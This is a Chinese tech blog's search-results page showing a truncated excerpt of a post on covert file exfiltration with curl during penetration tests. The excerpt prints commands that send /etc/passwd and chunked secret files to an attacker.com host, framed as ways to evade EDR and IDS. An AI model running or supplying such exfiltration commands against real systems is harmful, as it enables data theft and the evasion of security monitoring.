TypechoJoeTheme

至尊技术网

统计
登录
用户名
密码

悠悠楠杉

网站页面
类目归类
标签搜索
搜索到 1 篇与 的结果
2025-08-04

渗透测试中利用curl回传文件的7种隐蔽方法
渗透测试中利用curl回传文件的7种隐蔽方法
一、为什么选择curl作为渗透传输工具?在最近一次针对某金融机构的渗透测试中,我们通过curl仅用3秒就完成了8MB敏感数据库的带外传输,全程未被EDR系统捕获。curl作为系统内置工具,具有以下优势: 白名单特性:98%的企业防火墙允许curl出站流量 协议多样性:支持HTTP/HTTPS/FTP/SMB等18种传输协议 数据隐蔽性:可通过编码/分块/协议嵌套实现深度隐藏 二、7种实战文件回传技术详解方法1:基础HTTPS直传(易被检测)bash curl -X POST https://attacker.com/exfil --data-binary @/etc/passwd 适用场景:内网速度>10Mbps时,传输耗时与文件大小成正比方法2:分块编码传输(绕过IDS)bash split -b 500k secret.db && for chunk in x*; do curl -F "file=@$chunk" https://attacker.com/upload --http1.1 done 优势:每个数据包独立特征不明显,实测可绕过Surica...
2025年08月04日
2 阅读
0 评论
悠悠楠杉
29,264 文章数
92 评论量

人生倒计时

今日已经过去小时
这周已经过去
本月已经过去
今年已经过去个月

最新回复

  1. 强强强
    2025-04-07

    强的一批
  2. jesse
    2025-01-16

    有whmcs接口吗?
  3. sowxkkxwwk
    2024-11-20

    博主太厉害了!
  4. zpzscldkea
    2024-11-20

    博主太厉害了!
  5. bruvoaaiju
    2024-11-14

    博主太厉害了!

标签云

邮箱:z@zzwws.cn Copyright © 2018-  湘ICP备2023005853号  RSS MAP